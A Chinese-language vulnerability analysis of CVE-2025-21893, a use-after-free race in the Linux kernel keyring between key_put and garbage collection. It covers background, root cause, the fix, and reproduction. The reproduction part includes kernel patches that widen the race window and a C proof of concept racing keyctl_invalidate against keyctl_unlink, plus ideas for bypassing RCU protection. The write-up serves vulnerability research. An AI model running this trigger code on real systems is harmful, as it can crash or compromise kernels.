Linux内核Keyring框架UAF漏洞(CVE-2025-21893)分析与复现<\/h1>

0x00 漏洞概述<\/h2>
CVE-2025-21893是Linux内核keyring框架中的一个use-after-free漏洞，存在于6.13.2版本内核中。该漏洞源于key_put函数与垃圾回收机制(gc)之间的条件竞争，当key引用计数减为0后，gc可能提前释放key对象，而key_put仍会继续操作已释放的内存。<\/p>

0x01 前置知识<\/h2>

Keyring机制简介<\/h3>

Linux内核的keyring机制提供了一种安全存储和管理加密密钥、身份认证令牌、证书等敏感数据的方式。主要特点包括：<\/p>

通过系统调用管理密钥：add_key<\/code>、keyctl<\/code>、request_key<\/code><\/li>
密钥类型：user、logon等<\/li>

默认keyring：

进程Keyring：与进程绑定<\/li>
线程Keyring：与线程绑定<\/li>
用户Session Keyring：与用户会话绑定<\/li>
User Keyring：用户专属<\/li>
Group Keyring：用户组共享<\/li>
<\/ul>
<\/li>
<\/ul>
关键系统调用<\/h3>
add_key<\/h4>
向指定keyring添加新密钥：<\/p>
int<\/span> add_key<\/span>(const<\/span> char<\/span> *<\/span>type, const<\/span> char<\/span> *<\/span>description,
<\/span><\/span>           const<\/span> void<\/span> *<\/span>payload, size_t plen,
<\/span><\/span>           key_serial_t keyring);
<\/span><\/span><\/code><\/pre>keyctl<\/h4>
提供多种密钥管理功能：<\/p>
long<\/span> keyctl<\/span>(int<\/span> cmd, unsigned<\/span> long<\/span> arg2, unsigned<\/span> long<\/span> arg3,
<\/span><\/span>           unsigned<\/span> long<\/span> arg4, unsigned<\/span> long<\/span> arg5);
<\/span><\/span><\/code><\/pre>常用命令：<\/p>

KEYCTL_GET_KEYRING_ID<\/li>
KEYCTL_JOIN_SESSION_KEYRING<\/li>
KEYCTL_REVOKE<\/li>
KEYCTL_DESCRIBE<\/li>
KEYCTL_CLEAR<\/li>
KEYCTL_LINK<\/li>
KEYCTL_UNLINK<\/li>
KEYCTL_INVALIDATE<\/li>
KEYCTL_SEARCH<\/li>
KEYCTL_READ<\/li>
KEYCTL_INSTANTIATE<\/li>
<\/ul>
request_key<\/h4>
查找或请求密钥：<\/p>
key_serial_t request_key<\/span>(const<\/span> char<\/span> *<\/span>type, const<\/span> char<\/span> *<\/span>description,
<\/span><\/span>                        const<\/span> char<\/span> *<\/span>callout_info,
<\/span><\/span>                        key_serial_t keyring);
<\/span><\/span><\/code><\/pre>Keyring垃圾回收(GC)<\/h3>
位于security\/keys\/gc.c<\/code>，当执行以下操作时会触发GC：<\/p>

keyctl_invalidate<\/li>
key_put<\/li>
<\/ul>
GC通过schedule_work(&key_gc_work)<\/code>调用key_garbage_collector<\/code>进行释放操作。<\/p>
0x02 漏洞分析<\/h2>
漏洞根源<\/h3>
漏洞出现在key_put<\/code>函数中：<\/p>

将key->usage<\/code>引用计数减1<\/li>
如果引用计数减为0：

检查KEY_FLAG_IN_QUOTA<\/code>标志<\/li>
执行相关操作<\/li>
调用schedule_work(&key_gc_work)<\/code>触发GC<\/li>
<\/ul>
<\/li>
<\/ol>
问题在于：<\/p>

GC通过检查key->usage == 0<\/code>来判断是否释放key<\/li>
但key_put<\/code>在减引用后还会操作key对象<\/li>
如果GC在key_put<\/code>操作key前释放了它，就会导致UAF<\/li>
<\/ul>
修复方式<\/h3>
修复commit将：<\/p>

GC的判断条件从key->usage == 0<\/code>改为检查key->flags<\/code><\/li>
在key_put<\/code>完成所有操作后才设置相关flags<\/li>
<\/ul>
关键调用链<\/h3>


keyctl_invalidate<\/code>触发GC：<\/p>
keyctl_invalidate -> key_invalidate -> key_schedule_gc -> schedule_work(&key_gc_work)
<\/code><\/pre>
<\/li>

keyctl_unlink<\/code>触发key_put<\/code>：<\/p>
keyctl_unlink -> key_unlink -> __key_unlink_begin (创建edit)
             -> __key_unlink -> assoc_array_apply_edit
             -> call_rcu -> keyring_free_object -> key_put
<\/code><\/pre>
<\/li>
<\/ol>
0x03 漏洞复现<\/h2>
复现环境修改<\/h3>
由于漏洞触发条件极其苛刻，需要对内核进行3处修改以降低竞争难度：<\/p>

修改key_put<\/code>函数：<\/li>
<\/ol>
__attribute__((optimize("O0"<\/span>))) 
<\/span><\/span>void<\/span> key_put(struct<\/span> key *<\/span>key) {
<\/span><\/span>    \/\/ 原有减引用逻辑
<\/span><\/span><\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 0x100000<\/span>; i++<\/span>); \/\/ 大循环延迟
<\/span><\/span><\/span><\/span>    \/\/ 后续操作
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
修改key_garbage_collector<\/code>函数：<\/li>
<\/ol>
__attribute__((optimize("O0"<\/span>))) 
<\/span><\/span>void<\/span> key_garbage_collector(struct<\/span> work_struct *<\/span>work) {
<\/span><\/span>    for<\/span> (int<\/span> i =<\/span> 0<\/span>; i <<\/span> 0x100<\/span>; i++<\/span>); \/\/ 小循环延迟
<\/span><\/span><\/span><\/span>    \/\/ 原有GC逻辑
<\/span><\/span><\/span><\/span>}
<\/span><\/span><\/code><\/pre>
在key_ref_put<\/code>前添加synchronize_rcu<\/code>：<\/li>
<\/ol>
synchronize_rcu();
<\/span><\/span>key_ref_put(key_ref);
<\/span><\/span><\/code><\/pre>POC代码框架<\/h3>
#include<\/span> <stdio.h><\/span>
<\/span><\/span><\/span>#include<\/span> <stdlib.h><\/span>
<\/span><\/span><\/span>#include<\/span> <keyutils.h><\/span>
<\/span><\/span><\/span>#include<\/span> <pthread.h><\/span>
<\/span><\/span><\/span>#include<\/span> <unistd.h><\/span>
<\/span><\/span><\/span><\/span>
<\/span><\/span>void<\/span> *<\/span>invalidate_thread<\/span>(void<\/span> *<\/span>arg) {
<\/span><\/span>    key_serial_t key =<\/span> (key_serial_t)arg;
<\/span><\/span>    keyctl_invalidate(key);
<\/span><\/span>    return<\/span> NULL;
<\/span><\/span>}
<\/span><\/span>
<\/span><\/span>int<\/span> main<\/span>() {
<\/span><\/span>    \/\/ 创建keyring
<\/span><\/span><\/span><\/span>    key_serial_t ring =<\/span> add_key("keyring"<\/span>, "testring"<\/span>, NULL, 0<\/span>, KEY_SPEC_PROCESS_KEYRING);
<\/span><\/span>    
<\/span><\/span>    \/\/ 添加key
<\/span><\/span><\/span><\/span>    key_serial_t key =<\/span> add_key("user"<\/span>, "testkey"<\/span>, "payload"<\/span>, 7<\/span>, ring);
<\/span><\/span>    
<\/span><\/span>    pthread_t tid;
<\/span><\/span>    pthread_create(&<\/span>tid, NULL, invalidate_thread, (void<\/span> *<\/span>)key);
<\/span><\/span>    
<\/span><\/span>    \/\/ 从keyring中移除key
<\/span><\/span><\/span><\/span>    keyctl_unlink(key, ring);
<\/span><\/span>    
<\/span><\/span>    pthread_join(tid, NULL);
<\/span><\/span>    return<\/span> 0<\/span>;
<\/span><\/span>}
<\/span><\/span><\/code><\/pre>0x04 漏洞利用思路<\/h2>


利用条件竞争：<\/p>

线程1：通过keyctl_unlink<\/code>触发key_put<\/code><\/li>
线程2：通过keyctl_invalidate<\/code>触发GC<\/li>
精确控制时机使GC在key_put<\/code>操作key前释放它<\/li>
<\/ul>
<\/li>

绕过RCU保护：<\/p>

原始漏洞被RCU机制部分缓解<\/li>
可能的绕过方式：

在call_rcu<\/code>执行完key_put<\/code>后再调用key_ref_put<\/code><\/li>
使用其他对key进行操作的函数<\/li>
<\/ul>
<\/li>
<\/ul>
<\/li>
<\/ol>
0x05 总结<\/h2>
该漏洞的核心问题在于：<\/p>

GC错误地将引用计数为0作为释放条件<\/li>
在减引用后仍操作即将释放的指针<\/li>
异步操作缺乏适当的同步机制<\/li>
<\/ul>
这种异步操作导致的条件竞争问题是一个值得深入研究的攻击面，可能在其他类似场景中也会出现。<\/p>